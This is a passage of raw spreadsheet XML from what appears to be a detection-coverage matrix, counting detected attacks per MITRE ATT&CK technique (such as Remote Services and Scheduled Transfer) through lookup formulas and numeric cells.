        <f t="shared" si="10"/>
        <v>21 (48)</v>
      </c>
      <c r="BR8" s="12">
        <v>1</v>
      </c>
      <c r="BS8" s="12">
        <v>3</v>
      </c>
      <c r="BT8" s="13">
        <v>1</v>
      </c>
      <c r="BU8" s="394">
        <v>20</v>
      </c>
      <c r="BV8" s="292">
        <v>0</v>
      </c>
      <c r="BW8" s="322">
        <v>0</v>
      </c>
      <c r="BX8" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY8" s="12">
        <v>0</v>
      </c>
      <c r="BZ8" s="13">
        <v>0</v>
      </c>
      <c r="CA8" s="394">
        <v>0</v>
      </c>
      <c r="CB8" s="292">
        <v>1</v>
      </c>
      <c r="CC8" s="322">
        <v>1</v>
      </c>
      <c r="CD8" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE8" s="12">
        <v>0</v>
      </c>
      <c r="CF8" s="12">
        <v>1</v>
      </c>
      <c r="CG8" s="13">
        <v>1</v>
      </c>
      <c r="CH8" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:93" ht="15" customHeight="1">
      <c r="A9" s="4">
        <f t="shared" si="13"/>
        <v>7</v>
      </c>
      <c r="B9" s="4" t="str">
        <f>IFERROR(VLOOKUP(A9,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1021</v>
      </c>
      <c r="C9" s="493" t="str">
        <f>IFERROR(VLOOKUP(B9,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote Services</v>
      </c>
      <c r="D9" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B9)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E9" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F9" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G9" s="292">
        <v>0</v>
      </c>
      <c r="H9" s="322">
        <v>0</v>
      </c>
      <c r="I9" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J9" s="12">
        <v>0</v>
      </c>
      <c r="K9" s="13">
        <v>0</v>
      </c>
      <c r="L9" s="394">
        <v>0</v>
      </c>
      <c r="M9" s="322">
        <v>0</v>
      </c>
      <c r="N9" s="322">
        <v>0</v>
      </c>
      <c r="O9" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P9" s="12">
        <v>0</v>
      </c>
      <c r="Q9" s="13">
        <v>0</v>
      </c>
      <c r="R9" s="394">
        <v>0</v>
      </c>
      <c r="S9" s="409">
        <v>0</v>
      </c>
      <c r="T9" s="4">
        <v>0</v>
      </c>
      <c r="U9" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V9" s="4">
        <v>0</v>
      </c>
      <c r="W9" s="13">
        <v>0</v>
      </c>
      <c r="X9" s="394">
        <v>0</v>
      </c>
      <c r="Y9" s="392">
        <v>1</v>
      </c>
      <c r="Z9" s="392">
        <v>1</v>
      </c>
      <c r="AA9" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (1)</v>
      </c>
      <c r="AB9" s="392">
        <v>1</v>
      </c>
      <c r="AC9" s="16">
        <v>1</v>
      </c>
      <c r="AD9" s="394">
        <v>1</v>
      </c>
      <c r="AE9" s="392">
        <v>0</v>
      </c>
      <c r="AF9" s="392">
        <v>0</v>
      </c>
      <c r="AG9" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH9" s="392">
        <v>0</v>
      </c>
      <c r="AI9" s="16">
        <v>0</v>
      </c>
      <c r="AJ9" s="394">
        <v>0</v>
      </c>
      <c r="AK9" s="392">
        <v>1</v>
      </c>
      <c r="AL9" s="392">
        <v>1</v>
      </c>
      <c r="AM9" s="322" t="str">
        <f t="shared" si="5"/>
        <v>1 (1)</v>
      </c>
      <c r="AN9" s="392">
        <v>1</v>
      </c>
      <c r="AO9" s="16">
        <v>1</v>
      </c>
      <c r="AP9" s="394">
        <v>1</v>
      </c>
      <c r="AQ9" s="292">
        <v>0</v>
      </c>
      <c r="AR9" s="322">
        <v>0</v>
      </c>
      <c r="AS9" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT9" s="12">
        <v>0</v>
      </c>
      <c r="AU9" s="13">
        <v>0</v>
      </c>
      <c r="AV9" s="394">
        <v>0</v>
      </c>
      <c r="AW9" s="392">
        <v>1</v>
      </c>
      <c r="AX9" s="392">
        <v>1</v>
      </c>
      <c r="AY9" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (1)</v>
      </c>
      <c r="AZ9" s="4">
        <v>1</v>
      </c>
      <c r="BA9" s="16">
        <v>1</v>
      </c>
      <c r="BB9" s="394">
        <v>1</v>
      </c>
      <c r="BC9" s="292">
        <v>1</v>
      </c>
      <c r="BD9" s="322">
        <v>1</v>
      </c>
      <c r="BE9" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1 (1)</v>
      </c>
      <c r="BF9" s="12">
        <v>1</v>
      </c>
      <c r="BG9" s="13">
        <v>1</v>
      </c>
      <c r="BH9" s="394">
        <v>1</v>
      </c>
      <c r="BI9" s="292">
        <v>1</v>
      </c>
      <c r="BJ9" s="322">
        <v>1</v>
      </c>
      <c r="BK9" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (1)</v>
      </c>
      <c r="BL9" s="12">
        <v>1</v>
      </c>
      <c r="BM9" s="13">
        <v>1</v>
      </c>
      <c r="BN9" s="394">
        <v>1</v>
      </c>
      <c r="BO9" s="292">
        <v>2</v>
      </c>
      <c r="BP9" s="322">
        <v>2</v>
      </c>
      <c r="BQ9" s="322" t="str">
        <f t="shared" si="10"/>
        <v>2 (2)</v>
      </c>
      <c r="BR9" s="12">
        <v>1</v>
      </c>
      <c r="BS9" s="12">
        <v>1</v>
      </c>
      <c r="BT9" s="13">
        <v>1</v>
      </c>
      <c r="BU9" s="394">
        <v>1</v>
      </c>
      <c r="BV9" s="292">
        <v>0</v>
      </c>
      <c r="BW9" s="322">
        <v>0</v>
      </c>
      <c r="BX9" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY9" s="12">
        <v>0</v>
      </c>
      <c r="BZ9" s="13">
        <v>0</v>
      </c>
      <c r="CA9" s="394">
        <v>0</v>
      </c>
      <c r="CB9" s="292">
        <v>1</v>
      </c>
      <c r="CC9" s="322">
        <v>1</v>
      </c>
      <c r="CD9" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE9" s="12">
        <v>0</v>
      </c>
      <c r="CF9" s="12">
        <v>1</v>
      </c>
      <c r="CG9" s="13">
        <v>1</v>
      </c>
      <c r="CH9" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:93" ht="15" customHeight="1">
      <c r="A10" s="4">
        <f t="shared" si="13"/>
        <v>8</v>
      </c>
      <c r="B10" s="4" t="str">
        <f>IFERROR(VLOOKUP(A10,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1029</v>
      </c>
      <c r="C10" s="493" t="str">
        <f>IFERROR(VLOOKUP(B10,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Scheduled Transfer</v>
      </c>
      <c r="D10" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B10)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E10" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>9</v>
      </c>
      <c r="F10" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (9)</v>
      </c>
      <c r="G10" s="292">
        <v>0</v>
      </c>
      <c r="H10" s="322">
        <v>0</v>
      </c>
      <c r="I10" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J10" s="12">
        <v>0</v>
      </c>
      <c r="K10" s="13">
        <v>0</v>
      </c>
      <c r="L10" s="394">
        <v>0</v>
      </c>
      <c r="M10" s="322">
        <v>3</v>
      </c>
      <c r="N10" s="322">
        <v>3</v>
      </c>
      <c r="O10" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (3)</v>
      </c>
      <c r="P10" s="12">
        <v>3</v>
      </c>
      <c r="Q10" s="13">
        <v>1</v>
      </c>
      <c r="R10" s="394">
        <v>1</v>
      </c>
      <c r="S10" s="409">
        <v>3</v>
      </c>
      <c r="T10" s="4">
        <v>3</v>
      </c>
      <c r="U10" s="322" t="str">
        <f t="shared" si="2"/>
        <v>3 (3)</v>
      </c>
      <c r="V10" s="4">
        <v>3</v>
      </c>
      <c r="W10" s="13">
        <v>1</v>
      </c>
      <c r="X10" s="394">
        <v>1</v>
      </c>
      <c r="Y10" s="392">
        <v>38</v>
      </c>
      <c r="Z10" s="392">
        <v>1</v>
      </c>
      <c r="AA10" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (38)</v>
      </c>
      <c r="AB10" s="392">
        <v>1</v>
      </c>
      <c r="AC10" s="16">
        <v>1</v>
      </c>
      <c r="AD10" s="394">
        <v>1</v>
      </c>
      <c r="AE10" s="392">
        <v>3</v>
      </c>
      <c r="AF10" s="392">
        <v>3</v>
      </c>
      <c r="AG10" s="322" t="str">
        <f t="shared" si="4"/>
        <v>3 (3)</v>
      </c>
      <c r="AH10" s="392">
        <v>3</v>
      </c>
      <c r="AI10" s="16">
        <v>1</v>
      </c>
      <c r="AJ10" s="394">
        <v>1</v>
      </c>
      <c r="AK10" s="392">
        <v>41</v>
      </c>
      <c r="AL10" s="392">
        <v>4</v>
      </c>
      <c r="AM10" s="322" t="str">
        <f t="shared" si="5"/>
        <v>4 (41)</v>
      </c>
      <c r="AN10" s="392">
        <v>4</v>
      </c>
      <c r="AO10" s="16">
        <v>1</v>
      </c>
      <c r="AP10" s="394">
        <v>1</v>
      </c>
      <c r="AQ10" s="292">
        <v>0</v>
      </c>
      <c r="AR10" s="322">
        <v>0</v>
      </c>
      <c r="AS10" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT10" s="12">
        <v>0</v>
      </c>
      <c r="AU10" s="13">
        <v>0</v>
      </c>
      <c r="AV10" s="394">
        <v>0</v>
      </c>
      <c r="AW10" s="392">
        <v>0</v>
      </c>
      <c r="AX10" s="392">
        <v>0</v>
      </c>
      <c r="AY10" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ10" s="4">
        <v>0</v>
      </c>
      <c r="BA10" s="16">
        <v>0</v>
      </c>
      <c r="BB10" s="394">
        <v>0</v>
      </c>
      <c r="BC10" s="292">
        <v>3</v>
      </c>
      <c r="BD10" s="322">
        <v>3</v>
      </c>
      <c r="BE10" s="322" t="str">
        <f t="shared" si="8"/>
        <v>3 (3)</v>
      </c>
      <c r="BF10" s="12">
        <v>3</v>
      </c>
      <c r="BG10" s="13">
        <v>1</v>
      </c>
      <c r="BH10" s="394">
        <v>1</v>
      </c>
      <c r="BI10" s="292">
        <v>3</v>
      </c>
      <c r="BJ10" s="322">
        <v>2</v>
      </c>
      <c r="BK10" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (3)</v>
      </c>
      <c r="BL10" s="12">
        <v>2</v>
      </c>
      <c r="BM10" s="13">
        <v>1</v>
      </c>
      <c r="BN10" s="394">
        <v>2</v>
      </c>
      <c r="BO10" s="292">
        <v>10</v>
      </c>
      <c r="BP10" s="322">
        <v>9</v>
      </c>
      <c r="BQ10" s="322" t="str">
        <f t="shared" si="10"/>
        <v>9 (10)</v>
      </c>
      <c r="BR10" s="12">
        <v>2</v>
      </c>
      <c r="BS10" s="12">
        <v>3</v>
      </c>
      <c r="BT10" s="13">
        <v>1</v>
      </c>
      <c r="BU10" s="394">
        <v>7</v>
      </c>
      <c r="BV10" s="292">
        <v>1</v>
      </c>
      <c r="BW10" s="322">
        <v>1</v>
      </c>
      <c r="BX10" s="322" t="str">
        <f t="shared" si="11"/>
        <v>1 (1)</v>
      </c>
      <c r="BY10" s="12">
        <v>1</v>
      </c>
      <c r="BZ10" s="13">
        <v>1</v>
      </c>
      <c r="CA10" s="394">
        <v>1</v>
      </c>
      <c r="CB10" s="292">
        <v>4</v>
      </c>
      <c r="CC10" s="322">
        <v>1</v>
      </c>
      <c r="CD10" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (4)</v>
      </c>
      <c r="CE10" s="12">
        <v>0</v>
      </c>
      <c r="CF10" s="12">
        <v>1</v>
      </c>
      <c r="CG10" s="13">
        <v>1</v>
      </c>
      <c r="CH10" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:93" ht="15" customHeight="1">
      <c r="A11" s="4">
        <f t="shared" si="13"/>
        <v>9</v>
      </c>
      <c r="B11" s="4" t="str">
        <f>IFERROR(VLOOKUP(A11,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1030</v>
      </c>
      <c r="C11" s="493" t="str">
        <f>IFERROR(VLOOKUP(B11,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Transfer Size Limits</v>
      </c>
      <c r="D11" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B11)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E11" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>68</v>
      </c>
      <c r="F11" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (68)</v>
      </c>
      <c r="G11" s="292">
        <v>0</v>
      </c>
      <c r="H11" s="322">
        <v>0</v>
      </c>
      <c r="I11" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J11" s="12">
        <v>0</v>
      </c>
      <c r="K11" s="13">
        <v>0</v>
      </c>
      <c r="L11" s="394">
        <v>0</v>
      </c>
      <c r="M11" s="322">
        <v>1</v>
      </c>
      <c r="N11" s="322">
        <v>1</v>
      </c>
      <c r="O11" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="P11" s="12">
        <v>1</v>
      </c>
      <c r="Q11" s="13">
        <v>1</v>
      </c>
      <c r="R11" s="394">
        <v>1</v>
      </c>
      <c r="S11" s="409">
        <v>1</v>
      </c>
      <c r="T11" s="4">
        <v>1</v>
      </c>
      <c r="U11" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="V11" s="4">
        <v>1</v>
      </c>
      <c r="W11" s="13">
        <v>1</v>
      </c>
      <c r="X11" s="394">
        <v>1</v>
      </c>
      <c r="Y11" s="392">
        <v>0</v>
      </c>
      <c r="Z11" s="392">
        <v>0</v>
      </c>
      <c r="AA11" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB11" s="392">
        <v>0</v>
      </c>
      <c r="AC11" s="16">
        <v>0</v>
      </c>
      <c r="AD11" s="394">
        <v>0</v>
      </c>
      <c r="AE11" s="392">
        <v>2</v>
      </c>
      <c r="AF11" s="392">
        <v>2</v>
      </c>
      <c r="AG11" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (2)</v>
      </c>
      <c r="AH11" s="392">
        <v>2</v>
      </c>
      <c r="AI11" s="16">
        <v>1</v>
      </c>
      <c r="AJ11" s="394">
        <v>2</v>
      </c>
      <c r="AK11" s="392">
        <v>2</v>
      </c>
      <c r="AL11" s="392">
        <v>2</v>
      </c>
      <c r="AM11" s="322" t="str">
        <f t="shared" si="5"/>
        <v>2 (2)</v>
      </c>
      <c r="AN11" s="392">
        <v>2</v>
      </c>
      <c r="AO11" s="16">
        <v>1</v>
      </c>
      <c r="AP11" s="394">
        <v>2</v>
      </c>
      <c r="AQ11" s="292">
        <v>0</v>
      </c>
      <c r="AR11" s="322">
        <v>0</v>
      </c>
      <c r="AS11" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT11" s="12">
        <v>0</v>
      </c>
      <c r="AU11" s="13">
        <v>0</v>
      </c>
      <c r="AV11" s="394">
        <v>0</v>
      </c>
      <c r="AW11" s="392">
        <v>0</v>
      </c>
      <c r="AX11" s="392">
        <v>0</v>
      </c>
      <c r="AY11" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ11" s="4">
        <v>0</v>
      </c>
      <c r="BA11" s="16">
        <v>0</v>
      </c>
      <c r="BB11" s="394">
        <v>0</v>
      </c>
      <c r="BC11" s="292">
        <v>1</v>
      </c>
      <c r="BD11" s="322">
        <v>1</v>
      </c>
      <c r="BE11" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1 (1)</v>
      </c>
      <c r="BF11" s="12">
        <v>1</v>
      </c>
      <c r="BG11" s="13">
        <v>1</v>
      </c>
      <c r="BH11" s="394">
        <v>1</v>
      </c>
      <c r="BI11" s="292">
        <v>9</v>
      </c>
      <c r="BJ11" s="322">
        <v>5</v>
      </c>
      <c r="BK11" s="322" t="str">
        <f t="shared" si="9"/>
        <v>5 (9)</v>
      </c>
      <c r="BL11" s="12">
        <v>2</v>
      </c>
      <c r="BM11" s="13">
        <v>1</v>
      </c>
      <c r="BN11" s="394">
        <v>5</v>
      </c>
      <c r="BO11" s="292">
        <v>62</v>
      </c>
      <c r="BP11" s="322">
        <v>33</v>
      </c>
      <c r="BQ11" s="322" t="str">
        <f t="shared" si="10"/>
        <v>33 (62)</v>
      </c>
      <c r="BR11" s="12">
        <v>2</v>
      </c>
      <c r="BS11" s="12">
        <v>3</v>
      </c>
      <c r="BT11" s="13">
        <v>1</v>
      </c>
      <c r="BU11" s="394">
        <v>33</v>
      </c>
      <c r="BV11" s="292">
        <v>0</v>
      </c>
      <c r="BW11" s="322">
        <v>0</v>
      </c>
      <c r="BX11" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY11" s="12">
        <v>0</v>
      </c>
      <c r="BZ11" s="13">
        <v>0</v>
      </c>
      <c r="CA11" s="394">
        <v>0</v>
      </c>
      <c r="CB11" s="292">
        <v>0</v>
      </c>
      <c r="CC11" s="322">
        <v>0</v>
      </c>
      <c r="CD11" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE11" s="12">
        <v>0</v>
      </c>
      <c r="CF11" s="12">
        <v>0</v>
      </c>
      <c r="CG11" s="13">
        <v>0</v>
      </c>
      <c r="CH11" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:93" ht="15" customHeight="1">
      <c r="A12" s="4">
        <f t="shared" si="13"/>
        <v>10</v>
      </c>
      <c r="B12" s="4" t="str">
        <f>IFERROR(VLOOKUP(A12,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1033</v>
      </c>
      <c r="C12" s="493" t="str">
        <f>IFERROR(VLOOKUP(B12,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>System Owner/User Discovery</v>
      </c>
      <c r="D12" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B12)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E12" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>13</v>
      </c>
      <c r="F12" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (13)</v>
      </c>
      <c r="G12" s="292">
        <v>0</v>
      </c>
      <c r="H12" s="322">
        <v>0</v>
      </c>
      <c r="I12" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J12" s="12">
        <v>0</v>
      </c>
      <c r="K12" s="13">
        <v>0</v>
      </c>
      <c r="L12" s="394">
        <v>0</v>
      </c>
      <c r="M12" s="322">
        <v>0</v>
      </c>
      <c r="N12" s="322">
        <v>0</v>
      </c>
      <c r="O12" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P12" s="12">
        <v>0</v>
      </c>
      <c r="Q12" s="13">
        <v>0</v>
      </c>
      <c r="R12" s="394">
        <v>0</v>
      </c>
      <c r="S12" s="409">
        <v>0</v>
      </c>
      <c r="T12" s="4">
        <v>0</v>
      </c>
      <c r="U12" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V12" s="4">
        <v>0</v>
      </c>
      <c r="W12" s="13">
        <v>0</v>
      </c>
      <c r="X12" s="394">
        <v>0</v>
      </c>
      <c r="Y12" s="392">
        <v>1</v>
      </c>
      <c r="Z12" s="392">
        <v>1</v>
      </c>
      <c r="AA12" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (1)</v>
      </c>
      <c r="AB12" s="392">
        <v>1</v>
      </c>
      <c r="AC12" s="16">
        <v>1</v>
      </c>
      <c r="AD12" s="394">
        <v>1</v>
      </c>
      <c r="AE12" s="392">
        <v>0</v>
      </c>
      <c r="AF12" s="392">
        <v>0</v>
      </c>
      <c r="AG12" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH12" s="392">
        <v>0</v>
      </c>
      <c r="AI12" s="16">
        <v>0</v>
      </c>
      <c r="AJ12" s="394">
        <v>0</v>
      </c>
      <c r="AK12" s="392">
        <v>1</v>
      </c>
      <c r="AL12" s="392">
        <v>1</v>
      </c>
      <c r="AM12" s="322" t="str">
        <f t="shared" si="5"/>
        <v>1 (1)</v>
      </c>
      <c r="AN12" s="392">
        <v>1</v>
      </c>
      <c r="AO12" s="16">
        <v>1</v>
      </c>
      <c r="AP12" s="394">
        <v>1</v>
      </c>
      <c r="AQ12" s="292">
        <v>0</v>
      </c>
      <c r="AR12" s="322">
        <v>0</v>
      </c>
      <c r="AS12" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT12" s="12">
        <v>0</v>
      </c>
      <c r="AU12" s="13">
        <v>0</v>
      </c>
      <c r="AV12" s="394">
        <v>0</v>
      </c>
      <c r="AW12" s="392">
        <v>0</v>
      </c>
      <c r="AX12" s="392">
        <v>0</v>
      </c>
      <c r="AY12" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ12" s="4">
        <v>0</v>
      </c>
      <c r="BA12" s="16">
        <v>0</v>
      </c>
      <c r="BB12" s="394">
        <v>0</v>
      </c>
      <c r="BC12" s="292">
        <v>0</v>
      </c>
      <c r="BD12" s="322">
        <v>0</v>
      </c>
      <c r="BE12" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF12" s="12">
        <v>0</v>
      </c>
      <c r="BG12" s="13">
        <v>0</v>
      </c>
      <c r="BH12" s="394">
        <v>0</v>
      </c>
      <c r="BI12" s="292">
        <v>0</v>
      </c>
      <c r="BJ12" s="322">
        <v>0</v>
      </c>
      <c r="BK12" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL12" s="12">
        <v>0</v>
      </c>
      <c r="BM12" s="13">
        <v>0</v>
      </c>
      <c r="BN12" s="394">
        <v>0</v>
      </c>
      <c r="BO12" s="292">
        <v>8</v>
      </c>
      <c r="BP12" s="322">
        <v>8</v>
      </c>
      <c r="BQ12" s="322" t="str">
        <f t="shared" si="10"/>
        <v>8 (8)</v>
      </c>
      <c r="BR12" s="12">
        <v>0</v>
      </c>
      <c r="BS12" s="12">
        <v>4</v>
      </c>
      <c r="BT12" s="13">
        <v>1</v>
      </c>
      <c r="BU12" s="394">
        <v>7</v>
      </c>
      <c r="BV12" s="292">
        <v>0</v>
      </c>
      <c r="BW12" s="322">
        <v>0</v>
      </c>
      <c r="BX12" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY12" s="12">
        <v>0</v>
      </c>
      <c r="BZ12" s="13">
        <v>0</v>
      </c>
      <c r="CA12" s="394">
        <v>0</v>
      </c>
      <c r="CB12" s="292">
        <v>0</v>
      </c>
      <c r="CC12" s="322">
        <v>0</v>
      </c>
      <c r="CD12" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE12" s="12">
        <v>0</v>
      </c>
      <c r="CF12" s="12">
        <v>0</v>
      </c>
      <c r="CG12" s="13">
        <v>0</v>
      </c>
      <c r="CH12" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:93" ht="15" customHeight="1">
      <c r="A13" s="4">
        <f t="shared" si="13"/>
        <v>11</v>
      </c>
      <c r="B13" s="4" t="str">
        <f>IFERROR(VLOOKUP(A13,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1039</v>
      </c>
      <c r="C13" s="493" t="str">
        <f>IFERROR(VLOOKUP(B13,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data from Network Shared Drive</v>
      </c>
      <c r="D13" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B13)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E13" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F13" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (3)</v>
      </c>
      <c r="G13" s="292">
        <v>0</v>
      </c>
      <c r="H13" s="322">
        <v>0</v>
      </c>
      <c r="I13" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J13" s="12">
        <v>0</v>
      </c>
      <c r="K13" s="13">
        <v>0</v>
      </c>
      <c r="L13" s="394">
        <v>0</v>
      </c>
      <c r="M13" s="322">
        <v>0</v>
      </c>
      <c r="N13" s="322">
        <v>0</v>
      </c>
      <c r="O13" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P13" s="12">
        <v>0</v>
      </c>
      <c r="Q13" s="13">
        <v>0</v>
      </c>
      <c r="R13" s="394">
        <v>0</v>
      </c>
      <c r="S13" s="409">
        <v>0</v>
      </c>
      <c r="T13" s="4">
        <v>0</v>
      </c>
      <c r="U13" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V13" s="4">
        <v>0</v>
      </c>
      <c r="W13" s="13">
        <v>0</v>
      </c>
      <c r="X13" s="394">
        <v>0</v>
      </c>
      <c r="Y13" s="392">
        <v>1</v>
      </c>
      <c r="Z13" s="392">
        <v>1</v>
      </c>
      <c r="AA13" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (1)</v>
      </c>
      <c r="AB13" s="392">
        <v>1</v>
      </c>
      <c r="AC13" s="16">
        <v>1</v>
      </c>
      <c r="AD13" s="394">
        <v>1</v>
      </c>
      <c r="AE13" s="392">
        <v>0</v>
      </c>
      <c r="AF13" s="392">
        <v>0</v>
      </c>
      <c r="AG13" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH13" s="392">
        <v>0</v>
      </c>
      <c r="AI13" s="16">
        <v>0</v>
      </c>
      <c r="AJ13" s="394">
        <v>0</v>
      </c>
      <c r="AK13" s="392">
        <v>1</v>
      </c>
      <c r="AL13" s="392">
        <v>1</v>
      </c>
      <c r="AM13" s="322" t="str">
        <f t="shared" si="5"/>
        <v>1 (1)</v>
      </c>
      <c r="AN13" s="392">
        <v>1</v>
      </c>
      <c r="AO13" s="16">
        <v>1</v>
      </c>
      <c r="AP13" s="394">
        <v>1</v>
      </c>
      <c r="AQ13" s="292">
        <v>0</v>
      </c>
      <c r="AR13" s="322">
        <v>0</v>
      </c>
      <c r="AS13" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT13" s="12">
        <v>0</v>
      </c>
      <c r="AU13" s="13">
        <v>0</v>
      </c>
      <c r="AV13" s="394">
        <v>0</v>
      </c>
      <c r="AW13" s="392">
        <v>0</v>
      </c>
      <c r="AX13" s="392">
        <v>0</v>
      </c>
      <c r="AY13" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ13" s="4">
        <v>0</v>
      </c>
      <c r="BA13" s="16">
        <v>0</v>
      </c>
      <c r="BB13" s="394">
        <v>0</v>
      </c>
      <c r="BC13" s="292">
        <v>0</v>
      </c>
      <c r="BD13" s="322">
        <v>0</v>
      </c>
